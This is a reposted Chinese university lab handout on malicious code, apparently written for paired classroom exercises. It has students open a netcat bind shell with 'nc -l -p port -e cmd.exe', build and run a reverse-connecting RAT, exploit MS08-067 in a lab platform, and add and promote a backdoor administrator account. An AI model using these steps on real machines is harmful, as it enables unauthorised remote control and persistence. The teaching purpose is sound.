1．通過對木馬的練習，使讀者理解和掌握木馬傳播和運行的機制；通過手動刪除木馬，掌握檢查木馬和刪除木馬的技巧，學(xué)會防御木馬的相關(guān)知識，加深對木馬的安全防范意識。

?

2．了解并熟悉常用的網(wǎng)絡(luò)攻擊工具，木馬的基本功能；

3．達到鞏固課程知識和實際應(yīng)用的目的。

二、實驗要求

1．認真閱讀每個實驗內(nèi)容，需要截圖的題目，需清晰截圖并對截圖進行標注和說明。

2．文檔要求結(jié)構(gòu)清晰，圖文表達準確，標注規(guī)范。推理內(nèi)容客觀、合理、邏輯性強。

3．軟件工具可使用NC、MSF等。

4．實驗結(jié)束后，保留電子文檔。

三、實驗步驟

1．準備

提前做好實驗準備，實驗前應(yīng)把詳細了解實驗?zāi)康摹嶒炓蠛蛯嶒瀮?nèi)容，熟悉并準備好實驗用的軟件工具，按照實驗內(nèi)容和要求提前做好實驗內(nèi)容的準備。

2．實驗環(huán)境

描述實驗所使用的硬件和軟件環(huán)境（包括各種軟件工具）；

開機并啟動軟件office2003或2007、瀏覽器、加解密軟件。

3．實驗過程

1）啟動系統(tǒng)和啟動工具軟件環(huán)境。

2）用軟件工具實現(xiàn)實驗內(nèi)容。

4．實驗報告

按照統(tǒng)一要求的實驗報告格式書寫實驗報告。把按照模板格式編寫的文檔嵌入到實驗報告文檔中，文檔按照規(guī)定的書寫格式書寫，表格要有表說圖形要有圖說。

?

任務(wù)一?利用NC控制電腦

?

?NetCat，具有網(wǎng)絡(luò)軍刀之稱，它小巧精悍且功能強大，說它小巧精悍，是因為他的軟件大小現(xiàn)在已經(jīng)壓縮到只有十幾KB，而且在功能上絲毫不減。

?

實驗過程需要兩個同學(xué)相互配合完成：

?

步驟一：

?

???在受害者的機器?（同學(xué)A）
輸入下面的命令：
　　nc.exe?-l -p port -e cmd.exe ??進入監(jiān)聽模式

?

?

?

步驟二：
　　在攻擊者的機器.（同學(xué)B）
輸入下面的命令：
　　nc ip??port //連接victim_IP,然后得到一個shell。?（需要截圖）

?

?

?

?

?

步驟三：

?

????在shell中，利用net user?用戶名?密碼?/add?，添加一個用戶，并在受害者的機器中使用?net user?命令進行驗證。（需要截圖）

?

?

?

?

?

?

?可以繼續(xù)通過命令行做一些事情。

?

任務(wù)二?利用木馬控制電腦

?

實驗過程需要兩個同學(xué)配合：

?

步驟一：

?

???　攻擊者的機器.?（同學(xué)A）
打開V2014.exe程序或則star RAT，這兩個木馬功能類似。

?

?

?

?

步驟二：
　　點擊菜單欄中的“服務(wù)生成”，在彈出的配置服務(wù)端中，配置回連IP地址（攻擊者IP）和端口號，并點擊“生成”按鈕，生成木馬服務(wù)端。

?

?

?

?

?

?

?

?

步驟三：

?

將生成的木馬可執(zhí)行程序拷貝到受害者的機器，并雙擊運行。?

?

?雙擊運行不占用cpu。？？

?

步驟四：

?

?

在控制端中查看木馬上線情況，并對以下功能每個進行測試和截圖。?

?

?

?

?

?

?

會話管理，卸載對方的木馬。

?

任務(wù)三?通過漏洞獲取shell（合天平臺中做）?所有過程截圖寫博客

?windows ms08067 漏洞利用

在平臺中獲取shell之后，繼續(xù)利用攻擊機器使用

net user user pass /add

net localgroup administrators /add

命令向被攻擊的機器中添加賬戶，并提升為管理員

然后用rdesktop 10.1.1.130 登陸對方的遠程桌面

?

?

?

?

?

?

?

??

?

?

?

轉(zhuǎn)載于:https://www.cnblogs.com/P201421420042/p/7751605.html

總結(jié)

以上是生活随笔為你收集整理的实验四 恶意代码的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。